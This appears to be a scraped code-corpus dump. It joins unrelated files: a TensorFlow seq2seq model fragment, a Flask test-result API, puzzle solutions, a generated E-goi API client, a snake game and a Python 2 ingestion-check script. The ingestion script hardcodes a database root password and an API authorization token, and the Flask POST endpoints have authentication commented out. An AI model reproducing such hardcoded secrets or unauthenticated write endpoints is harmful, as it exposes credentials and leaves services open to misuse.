logits=lm_logits,
past_key_values=outputs.past_key_values, # index 1 of d outputs
decoder_hidden_states=outputs.decoder_hidden_states, # index 2 of d outputs
decoder_attentions=outputs.decoder_attentions, # index 3 of d outputs
cross_attentions=outputs.cross_attentions, # index 4 of d outputs
encoder_last_hidden_state=outputs.encoder_last_hidden_state, # index 0 of encoder outputs
encoder_hidden_states=outputs.encoder_hidden_states, # 1 of e out
encoder_attentions=outputs.encoder_attentions, # 2 of e out
)
# Copied from transformers.models.bart.modeling_tf_bart.TFBartForConditionalGeneration.serving_output
def serving_output(self, output):
pkv = tf.tuple(output.past_key_values)[1] if self.config.use_cache else None
dec_hs = tf.convert_to_tensor(output.decoder_hidden_states) if self.config.output_hidden_states else None
dec_attns = tf.convert_to_tensor(output.decoder_attentions) if self.config.output_attentions else None
cross_attns = tf.convert_to_tensor(output.cross_attentions) if self.config.output_attentions else None
enc_hs = tf.convert_to_tensor(output.encoder_hidden_states) if self.config.output_hidden_states else None
enc_attns = tf.convert_to_tensor(output.encoder_attentions) if self.config.output_attentions else None
return TFSeq2SeqLMOutput(
logits=output.logits,
past_key_values=pkv,
decoder_hidden_states=dec_hs,
decoder_attentions=dec_attns,
cross_attentions=cross_attns,
encoder_last_hidden_state=output.encoder_last_hidden_state,
encoder_hidden_states=enc_hs,
encoder_attentions=enc_attns,
)
# Copied from transformers.models.bart.modeling_tf_bart.TFBartForConditionalGeneration.prepare_inputs_for_generation
def prepare_inputs_for_generation(
self,
decoder_input_ids,
past=None,
attention_mask=None,
decoder_attention_mask=None,
head_mask=None,
decoder_head_mask=None,
cross_attn_head_mask=None,
use_cache=None,
encoder_outputs=None,
**kwargs
):
# cut decoder_input_ids if past is used
if past is not None:
decoder_input_ids = decoder_input_ids[:, -1:]
if decoder_attention_mask is not None: # xla
decoder_position_ids = tf.math.cumsum(decoder_attention_mask, axis=-1, exclusive=True)[:, -1:]
elif past is not None: # no xla + past
decoder_position_ids = past[0][0].shape[2]
else: # no xla + no past
decoder_position_ids = tf.range(decoder_input_ids.shape[1])
return {
"input_ids": None, # encoder_outputs is defined. input_ids not needed
"encoder_outputs": encoder_outputs,
"past_key_values": past,
"decoder_input_ids": decoder_input_ids,
"attention_mask": attention_mask,
"decoder_attention_mask": decoder_attention_mask,
"decoder_position_ids": decoder_position_ids,
"head_mask": head_mask,
"decoder_head_mask": decoder_head_mask,
"cross_attn_head_mask": cross_attn_head_mask,
"use_cache": use_cache, # change this to avoid caching (presumably for debugging)
}
def prepare_decoder_input_ids_from_labels(self, labels: tf.Tensor):
return shift_tokens_right(labels, self.config.pad_token_id, self.config.decoder_start_token_id)
@staticmethod
# Copied from transformers.models.bart.modeling_tf_bart.TFBartForConditionalGeneration._reorder_cache
def _reorder_cache(past, beam_idx):
reordered_past = ()
for layer_past in past:
# cached cross_attention states don't have to be reordered -> they are always the same
reordered_past += (
tuple(tf.gather(past_state, beam_idx, axis=0) for past_state in layer_past[:2]) + layer_past[2:],
)
return reordered_past
def adjust_logits_during_generation(
self, logits, cur_len, max_length, forced_bos_token_id, forced_eos_token_id, **kwargs
):
"""Never predict pad_token_id. Predict </s> when max_length is reached."""
vocab_range = tf.constant(range(self.config.vocab_size))
logits = tf.where(vocab_range == self.config.pad_token_id, LARGE_NEGATIVE, logits)
if cur_len == 1 and forced_bos_token_id is not None:
vocab_range = tf.constant(range(self.config.vocab_size))
return tf.where(vocab_range != forced_bos_token_id, LARGE_NEGATIVE, logits)
elif cur_len == max_length - 1 and forced_eos_token_id is not None:
vocab_range = tf.constant(range(self.config.vocab_size))
return tf.where(vocab_range != forced_eos_token_id, LARGE_NEGATIVE, logits)
else:
return logits
| [
"[email protected]"
] | |
b874247bc7250254be315256308819b4f715e819 | 9153b0679889a64dd9a0dae12d9e3e22a749bc69 | /webserver/app/main/controller/testresult_controller.py | 369d8b4c5ba239aee147559fbc2453f66115012a | [
"MIT"
] | permissive | Remoterwls/Auto-Test-System | 9e0a6c96a5222a7374e5755c518d7a10bb96f6bd | e865758241beee3bd0c56a120f3986b0c4aa7253 | refs/heads/master | 2022-12-03T01:55:37.158529 | 2020-07-30T10:17:19 | 2020-07-30T10:17:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,394 | py | import json
import os
from datetime import date, datetime, timedelta, timezone
from dateutil import parser, tz
from pathlib import Path
from bson.objectid import ObjectId
from flask import request, send_from_directory, url_for, current_app
from flask_restx import Resource
from mongoengine import DoesNotExist, ValidationError
from ..util.decorator import token_required, organization_team_required_by_args, organization_team_required_by_json
from ..util.get_path import get_test_results_root
from ..config import get_config
from ..model.database import QUEUE_PRIORITY_MAX, QUEUE_PRIORITY_MIN, Endpoint, Task, TestResult
from ..util.dto import TestResultDto
from ..util.response import response_message, ENOENT, EINVAL, SUCCESS, EPERM
api = TestResultDto.api
_test_report = TestResultDto.test_report
_record_test_result = TestResultDto.record_test_result
_test_result = TestResultDto.test_result
USERS_ROOT = Path(get_config().USERS_ROOT)
@api.route('/')
class TestResultRoot(Resource):
@token_required
@organization_team_required_by_args
@api.doc('get_task_report_list')
@api.param('page', description='The page number of the whole test report list')
@api.param('limit', description='The item number of a page')
@api.param('title', description='The test suite name')
@api.param('priority', description='The priority of the task')
@api.param('endpoint', description='The endpoint that runs the test')
@api.param('sort', default='-run_date', description='The sort field')
@api.param('start_date', description='The start date')
@api.param('end_date', description='The end date')
@api.marshal_list_with(_test_report)
def get(self, **kwargs):
"""Get the task report list"""
page = request.args.get('page', default=1)
limit = request.args.get('limit', default=10)
title = request.args.get('title', default=None)
priority = request.args.get('priority', default=None)
endpoint_uid = request.args.get('endpoint', default=None)
sort = request.args.get('sort', default='-run_date')
start_date = request.args.get('start_date', None)
end_date = request.args.get('end_date', None)
organization = kwargs['organization']
team = kwargs['team']
if start_date:
start_date = parser.parse(start_date)
if end_date is None:
end_date = datetime.now(timezone.utc)
else:
end_date = parser.parse(end_date)
if (start_date - end_date).days > 0:
return response_message(EINVAL, 'start date {} is larger than end date {}'.format(start_date, end_date)), 401
query = {'run_date__lte': end_date, 'run_date__gte': start_date, 'organization': organization}
else:
query = {'organization': organization}
if team:
query['team'] = team
page = int(page)
limit = int(limit)
if page <= 0 or limit <= 0:
return response_message(EINVAL, 'Field page and limit should be larger than 1'), 400
if priority and priority != '' and priority.isdigit() and \
int(priority) >= QUEUE_PRIORITY_MIN and int(priority) <= QUEUE_PRIORITY_MAX:
query['priority'] = priority
if title and priority != '':
query['test_suite__contains'] = title
if endpoint_uid and endpoint_uid != '':
endpoint = Endpoint.objects(uid=endpoint_uid).first()
if not endpoint:
return response_message(EINVAL, 'Endpoint not found'), 400
query['endpoint_run'] = endpoint
try:
dirs = os.listdir(get_test_results_root(team=team, organization=organization))
except FileNotFoundError:
return {'items': [], 'total': 0}
ret = []
for d in dirs:
try:
ObjectId(d)
except ValidationError as e:
current_app.logger.exception(e)
else:
ret.append(d)
all_tasks = Task.objects(id__in=ret, **query).order_by(sort)
ret = []
for t in all_tasks[(page - 1) * limit : page * limit]:
ret.append({
'id': str(t.id),
'test_suite': t.test_suite,
'testcases': t.testcases,
'comment': t.comment,
'priority': t.priority,
'run_date': t.run_date,
'tester': t.tester.name,
'status': t.status,
'variables': t.variables,
'endpoint_list': t.endpoint_list,
'parallelization': t.parallelization
})
return {'items': ret, 'total': all_tasks.count()}
# @token_required
@api.doc('record_the_test_case')
@api.expect(_record_test_result)
def post(self):
"""create the test result in the database for a task"""
data = request.json
if data is None:
return response_message(EINVAL, "Payload of the request is empty"), 400
task_id = data.get('task_id', None)
if task_id == None:
return response_message(EINVAL, "Field task_id is required"), 400
task = Task.objects(pk=task_id).first()
if not task:
return response_message(ENOENT, "Task not found"), 404
test_case = data.get('test_case', None)
if test_case == None:
return response_message(EINVAL, "Field test_case is required"), 400
test_result = TestResult()
test_result.test_case = test_case
test_result.task = task
test_result.test_site = task.endpoint_run.name
try:
test_result.save()
except ValidationError as e:
current_app.logger.exception(e)
return response_message(EINVAL, "Test result validation failed"), 400
task.test_results.append(test_result)
task.save()
@api.route('/<task_id>')
@api.param('task_id', 'id of the task for which to update the result')
class TestResultUpload(Resource):
# @token_required
@api.doc('update the test result')
@api.expect(_test_result)
def post(self, task_id):
"""
Update the test result for the test case of a test suite
Any items in the field more_result in the payload will be filled to the field more_result in the test result recorded in the database
"""
data = request.json
if data is None:
return response_message(EINVAL, "Payload of the request is empty"), 400
if isinstance(data, str):
data = json.loads(data)
task = Task.objects(pk=task_id).first()
if not task:
return response_message(ENOENT, "Task not found"), 404
if not task.test_results:
return response_message(ENOENT, "Test result not found"), 404
cur_test_result = task.test_results[-1]
for k, v in data.items():
if k != 'more_result' and getattr(TestResult, k, None) != None:
setattr(cur_test_result, k, v)
else:
cur_test_result.more_result[k] = v
try:
cur_test_result.save()
except ValidationError as e:
current_app.logger.exception(e)
return response_message(EPERM, "Test result validation failed"), 400
| [
"[email protected]"
] | |
06a3ccc9647df2d8be805513e54fa0479aa7d101 | 20674c17d815214bf66b75be686bb8a45c0f5914 | /version1/910_Smallest_Range_II.py | 3c29c134342ecfaaf96e139eb9e1f848e33f07ef | [] | no_license | moontree/leetcode | e7b670969fe20785b15aae82996875fd66de1b08 | f2bf9b13508cd01c8f383789569e55a438f77202 | refs/heads/master | 2021-05-20T20:36:45.615420 | 2020-04-02T09:15:26 | 2020-04-02T09:15:26 | 252,408,563 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,314 | py | """
Given an array A of integers,
for each integer A[i] we need to choose either x = -K or x = K,
and add x to A[i] (only once).
After this process, we have some array B.
Return the smallest possible difference between the maximum value of B and the minimum value of B.
Example 1:
Input:
A = [1], K = 0
Output:
0
Explanation:
B = [1]
Example 2:
Input:
A = [0,10], K = 2
Output:
6
Explanation:
B = [2,8]
Example 3:
Input:
A = [1,3,6], K = 3
Output:
3
Explanation:
B = [4,6,3]
Note:
1 <= A.length <= 10000
0 <= A[i] <= 10000
0 <= K <= 10000
"""
class Solution(object):
def smallestRangeII(self, A, K):
"""
:type A: List[int]
:type K: int
:rtype: int
"""
# in sorted A
# if A[i] + K, then A[i - 1] must + K
# if A[i] - K, then A[i + 1] must - K
A.sort()
res = float('inf')
if len(A) == 1:
return 0
for i in range(len(A)):
l = min(A[0] + K, A[i + 1] - K) if i < len(A) - 1 else A[0] + K
r = max(A[-1] - K, A[i] + K)
res = min(res, r - l)
return res
examples = [
{
"input": {
"A": [1],
"K": 0
},
"output": 0
}, {
"input": {
"A": [0, 10],
"K": 2
},
"output": 6
}, {
"input": {
"A": [1, 3, 6],
"K": 3
},
"output": 3
}, {
"input": {
"A": [2, 7, 2],
"K": 1
},
"output": 3
}, {
"input": {
"A": [7, 8, 8],
"K": 5
},
"output": 1
}, {
"input": {
"A": [4, 8, 2, 7, 2],
"K": 5
},
"output": 6
}, {
"input": {
"A": [7, 8, 8, 5, 2],
"K": 4
},
"output": 5
},
]
import time
if __name__ == '__main__':
solution = Solution()
for n in dir(solution):
if not n.startswith('__'):
func = getattr(solution, n)
print(func)
for example in examples:
print '----------'
start = time.time()
v = func(**example['input'])
end = time.time()
print v, v == example['output'], end - start
| [
"[email protected]"
] | |
53a36dfdacc99125a08b041494733bbc5773b5f3 | 60b1f668808de2b82c2fcb62b07b45bb165219f2 | /egoi-api/models/campaign_push_content_template.py | 5715e23678e0f22dc440f87b2c4e513c0561e029 | [] | no_license | andersonmiguel/Egoi | 6d37bf7a3a7555e764f7a6e792b3ef1c68fe8e20 | b5f59f9b33ea94e170f4e7e26c6a37a78d2874c2 | refs/heads/master | 2022-06-21T07:18:44.920786 | 2020-05-04T17:29:02 | 2020-05-04T17:29:02 | 261,250,618 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,703 | py | # coding: utf-8
"""
APIv3 (Beta)
# Introduction Just a quick peek!!! This is our new version of API. Remember, it is not stable yet!!! But we invite you play with it and give us your feedback ;) # Getting Started E-goi can be integrated with many environments and programming languages via our REST API. We've created a developer focused portal to give your organization a clear and quick overview of how to integrate with E-goi. The developer portal focuses on scenarios for integration and flow of events. We recommend familiarizing yourself with all of the content in the developer portal, before start using our rest API. The E-goi APIv3 is served over HTTPS. To ensure data privacy, unencrypted HTTP is not supported. Request data is passed to the API by POSTing JSON objects to the API endpoints with the appropriate parameters. BaseURL = api.egoiapp.com # RESTful Services This API supports 5 HTTP methods: * <b>GET</b>: The HTTP GET method is used to **read** (or retrieve) a representation of a resource. * <b>POST</b>: The POST verb is most-often utilized to **create** new resources. * <b>PATCH</b>: PATCH is used for **modify** capabilities. The PATCH request only needs to contain the changes to the resource, not the complete resource * <b>PUT</b>: PUT is most-often utilized for **update** capabilities, PUT-ing to a known resource URI with the request body containing the newly-updated representation of the original resource. * <b>DELETE</b>: DELETE is pretty easy to understand. It is used to **delete** a resource identified by a URI. # Authentication We use a custom authentication method, you will need a apikey that you can find in your account settings. Below you will see a curl example to get your account information: #!/bin/bash curl -X GET 'https://api.egoiapp.com/my-account' \\ -H 'accept: application/json' \\ -H 'Apikey: <YOUR_APY_KEY>' Here you can see a curl Post example with authentication: #!/bin/bash curl -X POST 'http://api.egoiapp.com/tags' \\ -H 'accept: application/json' \\ -H 'Apikey: <YOUR_APY_KEY>' \\ -H 'Content-Type: application/json' \\ -d '{`name`:`Your custom tag`,`color`:`#FFFFFF`}' # SDK Get started quickly with E-goi with our integration tools. Our SDK is a modern open source library that makes it easy to integrate your application with E-goi services. * <b><a href='https://github.com/E-goi/sdk-java'>Java</a></b> * <b><a href='https://github.com/E-goi/sdk-php'>PHP</a></b> * <b><a href='https://github.com/E-goi/sdk-python'>Python</a></b> <security-definitions/> # noqa: E501
The version of the OpenAPI document: 3.0.0-beta
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from egoi-api.configuration import Configuration
class CampaignPushContentTemplate(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'type': 'str',
'template_id': 'int'
}
attribute_map = {
'type': 'type',
'template_id': 'template_id'
}
discriminator_value_class_map = {
}
def __init__(self, type=None, template_id=None, local_vars_configuration=None): # noqa: E501
"""CampaignPushContentTemplate - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._type = None
self._template_id = None
self.discriminator = 'type'
self.type = type
self.template_id = template_id
@property
def type(self):
"""Gets the type of this CampaignPushContentTemplate. # noqa: E501
:return: The type of this CampaignPushContentTemplate. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this CampaignPushContentTemplate.
:param type: The type of this CampaignPushContentTemplate. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and type is None: # noqa: E501
raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501
allowed_values = ["template"] # noqa: E501
if self.local_vars_configuration.client_side_validation and type not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `type` ({0}), must be one of {1}" # noqa: E501
.format(type, allowed_values)
)
self._type = type
@property
def template_id(self):
"""Gets the template_id of this CampaignPushContentTemplate. # noqa: E501
ID of the template for this campaign # noqa: E501
:return: The template_id of this CampaignPushContentTemplate. # noqa: E501
:rtype: int
"""
return self._template_id
@template_id.setter
def template_id(self, template_id):
"""Sets the template_id of this CampaignPushContentTemplate.
ID of the template for this campaign # noqa: E501
:param template_id: The template_id of this CampaignPushContentTemplate. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and template_id is None: # noqa: E501
raise ValueError("Invalid value for `template_id`, must not be `None`") # noqa: E501
self._template_id = template_id
def get_real_child_model(self, data):
"""Returns the real base class specified by the discriminator"""
discriminator_key = self.attribute_map[self.discriminator]
discriminator_value = data[discriminator_key]
return self.discriminator_value_class_map.get(discriminator_value)
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CampaignPushContentTemplate):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, CampaignPushContentTemplate):
return True
return self.to_dict() != other.to_dict()
| [
"[email protected]"
] | |
a0756500f16eb446c0c1b5acdb3013ffd5fb367a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02675/s466664784.py | 78be685e40ac4a6f27ae611368839fa6f0052292 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 173 | py | N = int(input())
judge = N%10
hon = [2,4,5,7,9]
pon = [0,1,6,8]
bon = [3]
if judge in hon:
print("hon")
elif judge in pon:
print("pon")
elif judge in bon:
print("bon") | [
"[email protected]"
] | |
b14c8bc236b026f60a14731df9d445ec1900f808 | 55d36c0d471b5799838330cab64229947f10c99c | /Snake_lib/worm.py | d76fd6210da79d34edc4f885085c215d5744f396 | [] | no_license | hammadhaleem/Snake-game | 6fb601201686068cd7129317d42b498de886b1df | 2553cdcde641f4658d985ac5c3709ad786a57143 | refs/heads/master | 2021-01-22T09:41:42.787725 | 2013-04-21T16:52:30 | 2013-04-21T16:52:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,474 | py | # WORM Class #
import pygame
from globalvar import *
class Worm(object):
def __init__(self,surface,x,y,len=50):
self.player_name=" "
self.x=x
self.y=y
self.lag=1
self.first_x=self.x
self.first_y=self.y
self.surface=surface
self.color=worm_color
self.len=len
self.body_list=[[self.x, self.y +i] for i in range (self.len)]
self.growing=len
self.dir_x=0*self.lag
self.dir_y=-1*self.lag
self.first_dir_x=0*self.lag
self.first_dir_y=-1*self.lag
self.store_dir_x=0*self.lag
self.store_dir_y=0*self.lag
self.joon=3
self.score=0
self.head_r=2
self.domborkhor=0
self.control_up=pygame.K_UP
self.control_right=pygame.K_RIGHT
self.control_down=pygame.K_DOWN
self.control_left=pygame.K_LEFT
self.nitrogen_key=pygame.K_RSHIFT
self.nitrogen_counter=2
self.game_over=False
def analize(self,event):
up=self.control_up
right=self.control_right
down=self.control_down
left=self.control_left
nit=self.nitrogen_key
if event.key == up :
if self.dir_y==1*self.lag:
return
self.dir_x = 0*self.lag
self.dir_y = -1*self.lag
elif event.key == down :
if self.dir_y==-1*self.lag:
return
self.dir_x = 0*self.lag
self.dir_y = 1*self.lag
elif event.key == left:
if self.dir_x==1*self.lag:
return
self.dir_x = -1*self.lag
self.dir_y = 0*self.lag
elif event.key == right :
if self.dir_x==-1*self.lag:
return
self.dir_x = 1*self.lag
self.dir_y = 0*self.lag
elif event.key==nit and self.nitrogen_counter>=1:
self.eat_nitrogen()
self.nitrogen_counter-=1
def eat(self):
self.growing +=growing_worm
def draw(self):
#pygame.draw.circle(self.surface,self.color, (self.body_list[0][0],self.body_list[0][1]),self.head_r+ 1)
for i in self.body_list:
# pygame.draw.rect(display,(255,0,0),(i[0],i[1],5,s5))
pygame.draw.circle(self.surface,self.color, (i[0],i[1]),self.head_r)
def erase(self):
self.joon-=1
self.score-=1
self.body_list=[]
self.x=self.first_x
self.y=self.first_y
self.dir_x=self.first_dir_x
self.dir_y=self.first_dir_y
## def eat_dombor(self):
##
## if self.domborkhor!=1:
## self.domborkhor=1
## self.score-=1
## self.len-=dombor_effect
## self.growing-=dombor_effect
## for i in range(dombor_effect):
## if len(self.body_list)>20:
## self.body_list.pop()
##
def move(self):
self.x += self.dir_x
self.y += self.dir_y
if self.x<=0:
self.x=width
if self.y<=0:
self.y=height
if self.x>=width+1:
self.x=0
if self.y>=height+1:
self.y=0
#if self.x<=-2 or self.y<=-2 or self.x>=width+1 or self.y>=height :
# self.erase()
if [self.x,self.y] in self.body_list:
self.erase()
self.body_list.insert(0, [self.x, self.y])
if (self.growing > self.len):
self.len += 1
if len(self.body_list) > self.len:
self.body_list.pop()
def check_to_accident(self,x,y):
if [x,y] in self.body_list:
return True
## def eat_nitrogen(self):
## self.store_dir_x=self.dir_x
## self.store_dir_y=self.dir_y
## self.dir_x*=5
## self.dir_y*=5
##
## def un_eat_nitrogen(self):
## self.dir_x=self.store_dir_x
## self.dir_y=self.store_dir_y
## self.store_dir_x,self.store_dir_y=0,0
class AIWorm(Worm):
def __init__(self,surface,x,y,len=50):
Worm.__init__(self,surface,x,y,len=50)
self.start_delay=False
self.counter=0
def analize(self,xekh,yekh,rival,alert,aitype):#dlay==delay
print aitype
if aitype==2:
print self.start_delay
if self.start_delay==True:
self.counter+=1
if self.start_delay==True and self.counter>=30:
self.counter=0
self.start_delay=False
#if time==a:
# print "hahahhahahhhahhhahahhh\n\n\n\n\n"
if self.start_delay==False:
for i in rival.body_list:
if i[0]==self.x and abs(i[1]-self.y)<alert and self.dir_y==-1:
self.start_delay=True
if xekh>=0:
self.dir_x=-1
self.dir_y=0
if xekh<0:
self.dir_x=1
self.dir_y=0
return
if i[0]==self.x and abs(i[1]-self.y)<alert and self.dir_y==1:
self.start_delay=True
if xekh>=0:
self.dir_x=-1
self.dir_y=0
if xekh<0:
self.dir_x=1
self.dir_y=0
return
if i[1]==self.y and abs(i[0]-self.x)<alert and self.dir_x==-1:
self.start_delay=True
if yekh>=0:
self.dir_x=0
self.dir_y=-1
if yekh<0:
self.dir_x=0
self.dir_y=1
return
if i[1]==self.y and abs(i[0]-self.x)<alert and self.dir_x==1:
self.start_delay=True
if yekh>=0:
self.dir_x=0
self.dir_y=-1
if yekh<0:
self.dir_x=0
self.dir_y=1
return
if xekh==0:
if yekh<0:
self.dir_x=0
self.dir_y=1
return
if yekh>0:
self.dir_x=0
self.dir_y=-1
return
if yekh==0:
if xekh<0:
self.dir_x=1
self.dir_y=0
return
if xekh>0:
self.dir_x=-1
self.dir_y=0
return
if xekh>0:
if self.dir_x!=1:
self.dir_x=-1
self.dir_y=0
return
if xekh<0:
if self.dir_x!=-1:
self.dir_x=1
self.dir_y=0
return
if yekh>0:
if self.dir_y!=1:
self.dir_x=0
self.dir_y=-1
return
if yekh<0:
if self.dir_y!=-1:
self.dir_x=0
self.dir_y=1
return
if aitype==1:
pass
if xekh==0:
if yekh<0:
self.dir_x=0
self.dir_y=1
return
if yekh>0:
self.dir_x=0
self.dir_y=-1
return
if yekh==0:
if xekh<0:
self.dir_x=1
self.dir_y=0
return
if xekh>0:
self.dir_x=-1
self.dir_y=0
return
if xekh>0:
if self.dir_x!=1:
self.dir_x=-1
self.dir_y=0
return
if xekh<0:
if self.dir_x!=-1:
self.dir_x=1
self.dir_y=0
return
if yekh>0:
if self.dir_y!=1:
self.dir_x=0
self.dir_y=-1
return
if yekh<0:
if self.dir_y!=-1:
self.dir_x=0
self.dir_y=1
return
| [
"[email protected]"
] | |
027b9caef0850dcdd1dc4783426b6900fa67eaee | 2e58532464f58b27de68297b0348f0c460448474 | /Assignment-7/How_to_Write_Match/main_3.py | c7984212e0a63d3735236561dff194507a3e9578 | [] | no_license | RidaATariq/ITMD_413 | 969a2ebe48746b3269493027daef666bd7a26997 | ee1676419e2a09ce4d52cfca3c3e02f00b24f74f | refs/heads/main | 2023-04-20T19:15:12.864852 | 2021-05-09T18:41:46 | 2021-05-09T18:41:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py | import re
# pattern = re.compile(r'\d\d\d.\d\d\d.\d\d\d\d')
pattern = re.compile(r'\d{3}.\d{3}.\d{4}') # same pattern as above but number specifies the no. of /d
# matches = pattern.finditer(text_to_search)
# for match in matches:
# print(match)
with open('data.txt', 'r') as f:
contents = f.read()
matches = pattern.finditer(contents)
for match in matches:
print(match)
| [
"[email protected]"
] | |
bcbac824d74d96140a3d7c8bf90485d3a39c8eb8 | bf0aa689b92be1df24100e8581caab59a74e31db | /src/loaders/npzpck.py | c689dda4e06a1adf307df646cef07b6ad420aa1b | [
"MIT"
] | permissive | shmilee/gdpy3 | d7c689a70557534baa98595092cee0d737ea93cc | cdebb80dbb4a4d84ffa7115d8f18b5589fd40fb2 | refs/heads/master | 2023-08-19T22:42:40.305085 | 2023-08-15T02:11:15 | 2023-08-15T03:11:04 | 88,051,033 | 9 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,405 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2018-2020 shmilee
'''
Contains Npz pickled file loader class.
'''
import numpy
import zipfile
from ..glogger import getGLogger
from ..utils import inherit_docstring
from .base import BasePckLoader, _pck_copydoc_func
__all__ = ['NpzPckLoader']
log = getGLogger('L')
@inherit_docstring((BasePckLoader,), _pck_copydoc_func, template=None)
class NpzPckLoader(BasePckLoader):
'''
Load pickled data from ``.npz`` file. Return a dictionary-like object.
Attributes
{Attributes}
Parameters
{Parameters}
Notes
-----
Q: How to read data from .npz file?
A: npzfile[datakey]
>>> npzfile = numpy.load('/tmp/test.npz')
>>> datakey = 'group/key'
>>> npzfile[datakey]
'''
__slots__ = []
loader_type = '.npz'
def _special_check_path(self):
if zipfile.is_zipfile(self.path):
return True
else:
log.error("'%s' is not a ZIP file!" % self.path)
return False
def _special_open(self):
return numpy.load(self.path, allow_pickle=True)
def _special_close(self, pathobj):
pathobj.close()
def _special_getkeys(self, pathobj):
return sorted(dict.fromkeys(pathobj.files))
def _special_get(self, pathobj, key):
value = pathobj[key]
if value.size == 1:
value = value.item()
return value
| [
"[email protected]"
] | |
15fa7543b47b6784593debfdb2a8c0b909735180 | 4cef505611a04383310ce6556fac7acb02dbc8a1 | /No ingestion test script/No_ingestion_test_showtime_anytime.py | 3e7aaccddd9211ae1241a17fa2b57af461c79aeb | [] | no_license | Sayan8981/Projectx | 9d8727eec144da35f2acffc787f3c769beef02e1 | bcf93fe885e4cd68bb2c30c408a3b03e785965c3 | refs/heads/master | 2022-03-26T18:13:02.831185 | 2020-01-16T06:52:31 | 2020-01-16T06:52:31 | 187,637,492 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,357 | py |
"""Writer: Saayan"""
import MySQLdb
import collections
from pprint import pprint
import sys
import csv
import os
import pymysql
import pymongo
import datetime
import sys
import urllib2
import json
import os
from urllib2 import HTTPError
import httplib
import socket
def ingestion():
conn1=pymysql.connect(user="root",passwd="branch@123",host="localhost",db="branch_service")
cur1=conn1.cursor()
result_sheet='/No_ingestion_test_showtime_anytime.csv'
if(os.path.isfile(os.getcwd()+result_sheet)):
os.remove(os.getcwd()+result_sheet)
csv.register_dialect('excel',lineterminator = '\n',skipinitialspace=True,escapechar='')
w=open(os.getcwd()+result_sheet,"wa")
with w as mycsvfile:
fieldnames = ["showtime_id MO","showtime_id SE","showtime_id SM","projectx_id_showtime","Comment"]
writer = csv.DictWriter(mycsvfile,fieldnames=fieldnames,dialect="excel",lineterminator = '\n')
writer.writeheader()
total=0
total1=0
total2=0
query1="select source_program_id,item_type from showtime_anytime_programs where expired=0;"
cur1.execute(query1)
res1=cur1.fetchall()
j=0
k=0
l=0
m=0
n=0
o=0
p=0
q=0
r=0
for i in res1:
print i
showtime_projectx_id=[]
if list(i)!= []:
if i[1]=='movie':
print total,l,j,k
total=total+1
try:
url_showtime="http://34.231.212.186:81/projectx/mappingfromsource?sourceIds=%d&sourceName=ShowtimeAnyTime&showType=MO" %i[0]
response_showtime=urllib2.Request(url_showtime)
response_showtime.add_header('Authorization','Token token=efeb15f572641809acbc0c26c9c1b63f4f7f1fd7dcb68070e45e26f3a40ec8e3')
resp_showtime=urllib2.urlopen(response_showtime)
data_showtime=resp_showtime.read()
data_resp_showtime=json.loads(data_showtime)
except httplib.BadStatusLine:
continue
except urllib2.HTTPError:
continue
except socket.error:
continue
for jj in data_resp_showtime:
if jj["data_source"]=="ShowtimeAnyTime" and jj["type"]=="Program" and jj["sub_type"]=="MO":
showtime_projectx_id.append(jj["projectx_id"])
if len(showtime_projectx_id)>1:
j=j+1
writer.writerow({"showtime_id MO":str(i[0]),"projectx_id_showtime":showtime_projectx_id,"Comment":'Multiple ingestion for same content of Showtime'})
if len(showtime_projectx_id)==1:
k=k+1
if len(showtime_projectx_id)==0:
l=l+1
writer.writerow({"showtime_id MO":str(i[0]),"projectx_id_showtime":'',"Comment":'No Ingestion'})
print("total showtime id MO:", total ,"No ingestion: ", l, "Multiple mapped content :", j, "Total Fail: ", l+j, "Pass: ", k)
if i[1]=='episode':
total1=total1+1
try:
url_showtime="http://34.231.212.186:81/projectx/mappingfromsource?sourceIds=%d&sourceName=ShowtimeAnyTime&showType=SE" %i[0]
response_showtime=urllib2.Request(url_showtime)
response_showtime.add_header('Authorization','Token token=efeb15f572641809acbc0c26c9c1b63f4f7f1fd7dcb68070e45e26f3a40ec8e3')
resp_showtime=urllib2.urlopen(response_showtime)
data_showtime=resp_showtime.read()
data_resp_showtime=json.loads(data_showtime)
except httplib.BadStatusLine:
continue
except urllib2.HTTPError:
continue
except socket.error:
continue
